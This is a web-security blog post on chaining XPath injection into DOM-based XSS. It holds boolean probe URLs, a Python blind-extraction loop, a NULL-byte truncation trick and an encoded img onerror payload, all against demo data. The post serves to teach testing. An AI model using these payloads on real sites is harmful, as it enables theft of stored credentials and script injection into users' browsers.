Chaining XPath injections into DOM-based XSS

Most web apps defend against DOM-based Cross-Site Scripting (XSS) by validating user input before it is written into the DOM. Data requested from an API, however, is often trusted and left unvalidated because it didn't come directly from the user. This post shows a trick for tampering with that API-provided data through XPath injection. Since the data is not validated, the result is DOM-based XSS.

This attack is useful because implementations of XPath 1.0 offer a very limited attack surface. More critical attacks only become possible with XPath 2.0 and XPath 3.1, and implementations of those versions are not very popular, so most web apps out there use version 1.0.

Since a lot of people don't know XPath very well, I'll start with the basics of how XPath works, which you need in order to exploit it.

The first step in testing a web app for XPath injection is to send boolean-based conditions such as the following:

/vulnerable_page?id=1' and '1'='1
/vulnerable_page?id=1' and '1'='0

/vulnerable_page?id=1" and "1"="1
/vulnerable_page?id=1" and "1"="0

/vulnerable_page?id=1 and 1=1
/vulnerable_page?id=1 and 1=0
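
The probe pairs above can be generated for each quoting context with a few lines of Python. This is only a sketch: the base URL is the placeholder from the examples, and the helper name boolean_probes is made up for illustration. Each pair holds an always-true and an always-false variant, and a difference between the two responses hints at an injection.

```python
from urllib.parse import quote

# Placeholder endpoint taken from the examples above.
BASE = "/vulnerable_page?id=1"


def boolean_probes(base: str = BASE) -> list[tuple[str, str]]:
    """Return (true_probe, false_probe) URL pairs for each quoting context."""
    pairs = []
    for q in ("'", '"', ""):
        if q:
            # Quoted context: break out of the string, then re-open it.
            true_cond = f"{q} and {q}1{q}={q}1"
            false_cond = f"{q} and {q}1{q}={q}0"
        else:
            # Numeric context: no quotes needed.
            true_cond, false_cond = " and 1=1", " and 1=0"
        pairs.append(
            (base + quote(true_cond, safe=""), base + quote(false_cond, safe=""))
        )
    return pairs


for true_url, false_url in boolean_probes():
    print(true_url)
    print(false_url)
```

The conditions are URL-encoded here so the URLs can be sent as-is by an HTTP client.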

As you can see, this is very similar to testing for SQL injection. In fact, just as SQL is a language for querying databases, XPath is a language for querying XML documents. Suppose the web app has the following XML document containing a list of different molecules:

...
       <molecule>
               <id>6</id>
               <name>Haloperidol</name>
               <filename>haloperidol.png</filename>
               <description>Antipsychotic with a lot of side-effects</description>
       </molecule>
       <molecule>
               <id>7</id>
               <name>Norepinephrine</name>
               <filename>norepinephrine.png</filename>
               <description>Catecholamine responsible for attention and stress</description>
       </molecule>
       <molecule>
               <id>8</id>
               <name>Oxcarbazepine</name>
               <filename>oxcarbazepine.png</filename>
               <description>Anticonvulsant and antiepileptic</description>
       </molecule>
...

The application has an API that receives the id GET parameter and uses it to craft an XPath query that fetches information from the XML document.

In this particular example, the API responds with a JSON object that contains all the information that will be presented to the user (although the API could respond in any other format, such as plain XML).

JavaScript code on the page parses the JSON object and then writes its contents into the HTML code of the page.

If an XPath injection can be used to return a JSON object whose contents are defined by the attacker, then it would be possible to write any arbitrary value into the HTML code of the page, resulting in XSS.

The code in the API responsible for doing the XPath query looks like this:

data = xpath_processor.evaluate("//molecule[id/text()=" + id + "]")

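For example, if id is set to 6 and 1=1, this results in the following XPath query:
//molecule[id/text()=6 and 1=1]

It says: return all <molecule> nodes that contain an <id> node whose text content is equal to 6. The injected and 1=1 condition is always true, so it doesn't change the result.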
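
To make the concatenation concrete, here is a small Python sketch of how the query string ends up containing attacker-controlled syntax. The function name build_query is hypothetical; it only mirrors the string concatenation shown in the API code and does not evaluate anything.

```python
def build_query(id_param: str) -> str:
    """Mirror the API's concatenation: the parameter is pasted in unescaped."""
    return "//molecule[id/text()=" + id_param + "]"


print(build_query("6"))          # intended use
print(build_query("6 and 1=1"))  # injected condition that is always true
print(build_query("6 and 1=0"))  # injected condition that is always false
```

Because the parameter lands inside the predicate, anything that is valid XPath at that position becomes part of the query.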

XPath injections

It is possible to use XPath injections to exfiltrate confidential information from the XML. Suppose the app uses an XML document to store user information:

<users>
       <user>
               <id>0</id>
               <username>root</username>
               <password>33ee7e1eb504b6619c1b445ca1442c21</password>
               <email>root@demo-lab.com</email>
       </user>
       <user>
               <id>1</id>
               <username>web-admin</username>
               <password>be3306f431dae5ebc93eebb291f4914a</password>
               <email>webadmin@demo-lab.com</email>
       </user>
</users>

Now imagine the following XPath expression (vulnerable to injection) used to return the email of a specific user:

data = xpath_processor.evaluate("//user[id/text()=" + id + "]/email")

Evaluated expression:
//user[id/text()=1]/email

This says: search all <user> nodes that have an <id> node whose text content is equal to 1 and return its <email> node.
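
The lookup can be tried locally with Python's standard library. Note that xml.etree.ElementTree only supports a subset of XPath, so the sketch below uses the closest equivalent predicate ([id='1']) rather than the exact expression above. The helper name email_for is made up for illustration.

```python
import xml.etree.ElementTree as ET

USERS_XML = """
<users>
  <user>
    <id>0</id><username>root</username>
    <password>33ee7e1eb504b6619c1b445ca1442c21</password>
    <email>root@demo-lab.com</email>
  </user>
  <user>
    <id>1</id><username>web-admin</username>
    <password>be3306f431dae5ebc93eebb291f4914a</password>
    <email>webadmin@demo-lab.com</email>
  </user>
</users>
""".strip()

root = ET.fromstring(USERS_XML)


def email_for(user_id: str) -> list[str]:
    """ElementTree approximation of //user[id/text()=<user_id>]/email."""
    return [e.text for e in root.findall(f".//user[id='{user_id}']/email")]


print(email_for("1"))
```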

An XPath injection can be used to exfiltrate information from the XML document by testing conditions that result in TRUE or FALSE responses:

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='1']/email
FALSE response

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='2']/email
FALSE response

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='3']/email
TRUE response

This says: return the <email> node of a <user> node that has an <id> equal to 1 if the first character of the <password> node inside the <user> node with id=0 is equal to '3'. Then you just iterate over all possible values and collect the TRUE and FALSE responses.
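
The iteration can be sketched in Python as follows. Everything here is illustrative: injected_id builds the value for the id parameter, extract loops over positions and candidate characters, and fake_oracle stands in for the real HTTP request by simulating the TRUE/FALSE responses against a known value. The lowercase hex alphabet is an assumption based on the password hashes in the example document.

```python
import re
import string
from typing import Callable

# Assumption: the target value is a lowercase hex hash, as in the example XML.
HEX = string.digits + "abcdef"


def injected_id(position: int, candidate: str) -> str:
    """Value for the id parameter that tests one character of root's password."""
    return (
        "1 and substring(//user[id/text()=0]/password,"
        f"{position},1)='{candidate}'"
    )


def extract(oracle: Callable[[str], bool], length: int, alphabet: str = HEX) -> str:
    """Recover `length` characters, one TRUE/FALSE question at a time."""
    recovered = ""
    for position in range(1, length + 1):  # XPath substring() is 1-indexed
        for candidate in alphabet:
            if oracle(injected_id(position, candidate)):
                recovered += candidate
                break
        else:
            recovered += "?"  # no candidate matched at this position
    return recovered


# Stand-in for the real target: answers TRUE/FALSE like the vulnerable app would.
SECRET = "33ee7e1eb504b6619c1b445ca1442c21"


def fake_oracle(id_value: str) -> bool:
    match = re.search(r"password,(\d+),1\)='(.)'", id_value)
    return bool(match) and SECRET[int(match.group(1)) - 1] == match.group(2)


print(extract(fake_oracle, len(SECRET)))
```

Against a real target, the oracle would send the request and decide TRUE or FALSE from the response, for example by checking whether the email appears in it.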

The blind problem

Usually, XPath injections can only exfiltrate information one character at a time by testing boolean conditions. If the XPath query is altered to return the <password> node instead of the <email> node, the trailing text after the injection results in invalid syntax:

//user[id/text()=-1 or id/text()=0]/password]/email

The idea of using a single-line comment (just like -- or # in SQL) to ignore the trailing text might come to mind. The problem is that, according to the XPath specification, comments must start with (: and end with :). This means that if the comment is left unclosed, the expression results in a syntax error.

After doing some simple fuzzing of Saxon (an XPath implementation developed by Saxonica) I found that it is possible to use a NULL byte to terminate the string and ignore everything after it. This trick makes it possible to return the content of any node instead of the originally intended node:

//user[id/text()=1 or id/text()=0]/password%00]/email

The trailing text doesn't cause an error anymore.
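
The effect of the NULL byte can be modelled in a few lines of Python. This is a simulation only: as_seen_by_parser simply cuts the string at the first NULL byte to mimic the behaviour described above for Saxon, and both function names are made up for illustration. No XPath engine is involved.

```python
def build_user_query(id_param: str) -> str:
    """Mirror the vulnerable concatenation from the email lookup."""
    return "//user[id/text()=" + id_param + "]/email"


def as_seen_by_parser(query: str) -> str:
    """Assumption: model a parser that stops reading at the first NULL byte."""
    return query.split("\x00", 1)[0]


payload = "1 or id/text()=0]/password\x00"
full_query = build_user_query(payload)

print(repr(full_query))               # still contains the trailing ]/email
print(as_seen_by_parser(full_query))  # what is left after truncation
```

In this model the trailing ]/email is dropped, so the query that remains selects the <password> nodes directly.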

Escalate XPath injections into XSS

Okay, so remember the previous example of the XML document containing a list of different molecules? That XML document happens to be a catalog that is publicly available for anyone to access. So, in this case there's nothing confidential to exfiltrate.

In a case like this, chaining the XPath injection into a DOM-based XSS would be the way to go.

For your convenience, once again here are the screenshots of the API and the vulnerable page:

The code responsible for requesting the API and displaying its response:

The XPath query made by the API:
//molecule[id/text()=6 and 1=1]

It is possible to force XPath to return a string explicitly defined in the query itself:

//molecule[id/text()=1]/"hello"%00]

This query would force XPath to return the "hello" string instead of a node. However, such an injection would yield a 500 INTERNAL SERVER ERROR response.

This is because the API expects XPath to return a set of XML nodes, which it then formats as JSON for the response. So the solution is to return a string containing XML code with the values to be written into the page:

//molecule[id/text()=1]/'<whatever><id>51966</id><name>XSS payload</name><filename>lol.jpg</filename><description>&lt;img src onerror=alert(/XSS/)&gt;</description></whatever>'%00]
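
The XML string can be assembled programmatically. The sketch below assumes the API parses the returned string as XML before building its JSON response, which is why the HTML payload is entity-escaped: after parsing, the <description> text is the raw <img> tag. The names build_fake_molecule and injected_id are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def build_fake_molecule(xss: str) -> str:
    """Build a fake record whose <description> carries the HTML payload."""
    return (
        "<whatever><id>51966</id><name>XSS payload</name>"
        "<filename>lol.jpg</filename>"
        f"<description>{escape(xss)}</description></whatever>"
    )


xml_payload = build_fake_molecule("<img src onerror=alert(/XSS/)>")

# Value for the id parameter: close the predicate, return the XML string,
# then cut off the trailing text with a NULL byte.
injected_id = f"1]/'{xml_payload}'\x00"

# What an XML parser recovers from the <description> element.
description = ET.fromstring(xml_payload).find("description").text

print(xml_payload)
print(description)
```

The payload must not contain a single quote, since the whole XML string sits inside a single-quoted XPath string literal.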

Remember to double URL-encode the / and & symbols and the NULL byte:

https://localhost/molecules/view/6]%252f%27%3Cwhatever%3E%3Cid%3E51966%3C%252fid%3E%3Cname%3EXSS%20payload%3C%252fname%3E%3Cfilename%3Elol.jpg%3C%252ffilename%3E%3Cdescription%3E%2526lt;img%20src%20onerror=alert(%252fXSS%252f)%2526gt;%3C%252fdescription%3E%3C%252fwhatever%3E%27%2500
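
The encoding step can be automated. The following Python sketch double-encodes only the three characters mentioned above and single-encodes everything else. It is stricter than the hand-written URL (it also encodes characters such as = and parentheses, and uses uppercase hex), but it decodes to the same payload. The function name encode_payload is made up for illustration.

```python
from urllib.parse import quote, unquote

# Characters that need two rounds of URL-encoding, as described above.
DOUBLE_ENCODED = {"/", "&", "\x00"}


def encode_payload(payload: str) -> str:
    """Percent-encode a payload, applying a second round to /, & and NUL."""
    parts = []
    for ch in payload:
        once = quote(ch, safe="")
        parts.append(quote(once, safe="") if ch in DOUBLE_ENCODED else once)
    return "".join(parts)


sample = "6]/'<id>1</id>&lt;img&gt;'\x00"
encoded = encode_payload(sample)

print(encoded)
print(unquote(encoded))           # after the first decoding round
print(repr(unquote(unquote(encoded))))  # after the second round: the raw payload
```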

And now you've escalated an otherwise useless XPath injection into a DOM-based XSS.

With the introduction of XPath 2.0 and XPath 3.1, it became possible to exfiltrate data from XML documents other than the one being queried, and even from document types other than XML. But sometimes none of these will do. The following paper describes more critical attacks that can be carried out against XPath versions 2.0 and 3.1: https://nzt-48.org/modern-xpath-exploitation

X: @ruben_v_pina
Mastodon/infosec.exchange: @ruben_v_pina
Linkedin: https://www.linkedin.com/in/ruben-v-pina/

Filed under: Hacking,Web Application Security,XSS - @ 2025-05-15 00:33